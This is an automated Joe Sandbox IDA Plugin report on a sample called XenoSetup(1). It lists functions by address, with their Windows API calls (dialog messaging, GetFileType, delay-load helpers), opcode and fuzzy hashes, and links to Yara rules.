Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 198c9d08dc30304eab92b0b00e3212da90dcc2e7e1ec173f7b8de8df7e3b0d91
Instruction ID: 632170ae421dd42d0a7bab3135a098a8d5aa13a46e3e7e39d88d09845c6b3781
Opcode Fuzzy Hash: 198c9d08dc30304eab92b0b00e3212da90dcc2e7e1ec173f7b8de8df7e3b0d91
Instruction Fuzzy Hash: 3CD0A9F448034C8BC221FAA8AE827343650BB24750F980001B3C4DA078DA7D50C0EB09

Function 00FFDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00FF1B3E), ref: 00FFDD92

Part of subcall function 00FFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FFB579
Part of subcall function 00FFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FFB58A
Part of subcall function 00FFB568: IsDialogMessageW.USER32(00090028,?), ref: 00FFB59E
Part of subcall function 00FFB568: TranslateMessage.USER32(?), ref: 00FFB5AC
Part of subcall function 00FFB568: DispatchMessageW.USER32(?), ref: 00FFB5B6

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 20dd8c8c81b621fedca598a3e80e9d8f91ec15bc2e6c028732d8e8f991f53c1f
Instruction ID: 688ae9db8d596e3f5f59fc957e6e2db9a432f65ba01d2534d379804a843bbf1d
Opcode Fuzzy Hash: 20dd8c8c81b621fedca598a3e80e9d8f91ec15bc2e6c028732d8e8f991f53c1f
Instruction Fuzzy Hash: DED09E75144300BBD6112B51CE06F1A7AE2BF98B04F404555B384740B5CA7A9D21EB11

Function 00FE98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00FE97BE), ref: 00FE98C8

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: c2fa32bd050227bfeba1232199a17c19489d53ee2bb067d38fc53948184ad8ad
Instruction ID: 9d6595e513db260f2592e351af226f1fe0d5acba528f02f4758f09070a69ea39
Opcode Fuzzy Hash: c2fa32bd050227bfeba1232199a17c19489d53ee2bb067d38fc53948184ad8ad
Instruction Fuzzy Hash: B5C012348082858ACE318A2698480997322BA933B67F49694D068890B1C367CD8BFB22

Function 00FFE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 27cdee04d1ca83b7fa521c135fe6e7fcd452f0e919ec08463c7544e8ebbf9cf5
Instruction ID: d1adf6b6ec5a505703b889785f9aa8a487b1312c3117a081f4a655b01adb07ff
Opcode Fuzzy Hash: 27cdee04d1ca83b7fa521c135fe6e7fcd452f0e919ec08463c7544e8ebbf9cf5
Instruction Fuzzy Hash: 32B012D2298144BD311466075D02D37125CDAC1F20330C03EFD46C8170E844DC442431

Function 00FFE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 24ae6ccc89fcab325e0506035b33bd1c3ba0b266ab78283f6b06ffe183224a81
Instruction ID: 2cfcbe6b151b505a865ff704504cb34052fac6c7b47dc3e7b8a0b4df6b081496
Opcode Fuzzy Hash: 24ae6ccc89fcab325e0506035b33bd1c3ba0b266ab78283f6b06ffe183224a81
Instruction Fuzzy Hash: C5B012D629C208AE3114614B5D43D37121CEAC0F20330403EF946C8070E8449C402531

Function 00FFE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2c76df64b5be95e9ddee889256f7193c2ce5fd5956d136e134e512d9c4fcb518
Instruction ID: c9e22365c5ca2aad589989fdf51e583b0979f950f210bc0d7b5d9f060f378dfb
Opcode Fuzzy Hash: 2c76df64b5be95e9ddee889256f7193c2ce5fd5956d136e134e512d9c4fcb518
Instruction Fuzzy Hash: E9B012D6298244BE311421475D43C37121CDAC1F20330843EFD42C8470E844DC402431

Function 00FFEAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFEAF9

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d8528d444d9ac19fc9fde5cda0f7886374fdc65b0b27a7ccc749f4c9af8b83b9
Instruction ID: 7c4481b9b1abe260f2628409daf318ebc88898e075629126c5aec8e96538f607
Opcode Fuzzy Hash: d8528d444d9ac19fc9fde5cda0f7886374fdc65b0b27a7ccc749f4c9af8b83b9
Instruction Fuzzy Hash: F7B012C72DA1967D310472415E42C37010CEAC0FE0330952FFA81CC075DC885C012431

Function 00FFE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c3eeea6f885d59002f5cfb34b4a381d40e9e5ecbed0a6a95b30e43a0a5686ed2
Instruction ID: 3adfa0099b5e22358c695b8352258a3c3b2598f1ba35d657c41f1fe1872b35ee
Opcode Fuzzy Hash: c3eeea6f885d59002f5cfb34b4a381d40e9e5ecbed0a6a95b30e43a0a5686ed2
Instruction Fuzzy Hash: 54B012E2298104AD311461075E02D37529CDAC0F20330403EF946C8070EC449D412431

Function 00FFE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b674d1081240b7974e6bb6a56cd9c7b19fc7d2e56f3b917cf934aba687be840d
Instruction ID: 68417d9b123d115bd3cce75a326ded5d875ff3d1d8017ef18dc2e8b4681bcdd0
Opcode Fuzzy Hash: b674d1081240b7974e6bb6a56cd9c7b19fc7d2e56f3b917cf934aba687be840d
Instruction Fuzzy Hash: 61B012D6298144AD311461175D02D37125CDAC1F20330803EFE46C8070E844DC402431

Function 00FFE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1abd68306cbe060daeb945f479f2b395504210ba621e02257c2d8c35aa87befb
Instruction ID: b1cf749793cd34ae8b0a09d7cd83559eefe80957b3e97e65c9e7276d65361d62
Opcode Fuzzy Hash: 1abd68306cbe060daeb945f479f2b395504210ba621e02257c2d8c35aa87befb
Instruction Fuzzy Hash: 71B012D22A9144AD311461075D02D37125DEFC0F20330403EFD47C8070E8449C402431

Function 00FFE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c6c93aa6382696003c45b8f910fa964c6268f364695c3ead84c9e02749adc2c8
Instruction ID: 11437fc490e9f425e7275baa3a8a69aa2fc47e5f37d4d15c565684070c27e91f
Opcode Fuzzy Hash: c6c93aa6382696003c45b8f910fa964c6268f364695c3ead84c9e02749adc2c8
Instruction Fuzzy Hash: 14B012E2299244BD315462075D02D37121DDBC0F20330413EFD46C8070E8449C842431

Function 00FFE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 26a55cb5472656cd36dc36df79a6bc0d35c544cc688fe2484e9966e91f233b41
Instruction ID: 660484ab435d9d44e5a0d30207bb24af9fc96e61cc8ac6f953d44cd796cb5375
Opcode Fuzzy Hash: 26a55cb5472656cd36dc36df79a6bc0d35c544cc688fe2484e9966e91f233b41
Instruction Fuzzy Hash: 04B012D2299184AD311461075D02D37121DDBC1F20330803EFD46C8070E844DC402431

Function 00FFE23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fb6553e5a9ba683b27ae0ca827607a10fd5b2aab3c5047e1d1c801236d387d48
Instruction ID: 17aefef5f5f0e2dcc8ac035e828aaefea8daef43209d663d928ce06bdd50e872
Opcode Fuzzy Hash: fb6553e5a9ba683b27ae0ca827607a10fd5b2aab3c5047e1d1c801236d387d48
Instruction Fuzzy Hash: F6B012E2298104AD311461075D02D37521CEAC0F20330403EF946C8071E8449D402431

Function 00FFE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 41c053d7e201ac0f78651328384d83f8f48832431e0c76193539e7dd52e76508
Instruction ID: 24733c11c00824f213f27cc2a6f85c97253c0c8b453ffcfceb9be3eb515e8f30
Opcode Fuzzy Hash: 41c053d7e201ac0f78651328384d83f8f48832431e0c76193539e7dd52e76508
Instruction Fuzzy Hash: 46B012E2298104AD311461075E02D37521CDAC0F20330403EF946C8070EC449E412431

Function 00FFE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 24447fae579312a053537edff96f2979c7befea3a9fae76070ecc15bc1188526
Instruction ID: 8648420911f7f6f9053b4a9b47ef74cbd914067d5de93e6c108cfef91af8990f
Opcode Fuzzy Hash: 24447fae579312a053537edff96f2979c7befea3a9fae76070ecc15bc1188526
Instruction Fuzzy Hash: 60B012E2298204BD315461075D02D37121CDAC0F20330413EF946C8070E8449D802431

Function 00FFE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8c3a62e4d9d52038bf87dafa30a5436982d6fbf044e66237e8cb5b1118deaa60
Instruction ID: 956a03756cfbb88924d65c732d59c2b7ae71bb1b4785c767ba97f4aaac1bdf8c
Opcode Fuzzy Hash: 8c3a62e4d9d52038bf87dafa30a5436982d6fbf044e66237e8cb5b1118deaa60
Instruction Fuzzy Hash: 9DB012E2298144BD311461075D02D37121CDAC1F20330813EFD46C8070E844DD402431

Function 00FFE20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 40ab02e4fe59e072e4be6d226cee489687ed623d9c86877383c80a15cf56f40d
Instruction ID: 148b19c53172a856633173ceb2029b6fcd57452949219eb81dc55c50891a5190
Opcode Fuzzy Hash: 40ab02e4fe59e072e4be6d226cee489687ed623d9c86877383c80a15cf56f40d
Instruction Fuzzy Hash: 8BB012D2298114BD311462075E02D37521CDAC0F20330803EF946C8170EC549D492431

Function 00FFE200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00FFE1E3

Part of subcall function 00FFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FFE8D0
Part of subcall function 00FFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FFE8E1

Memory Dump Source

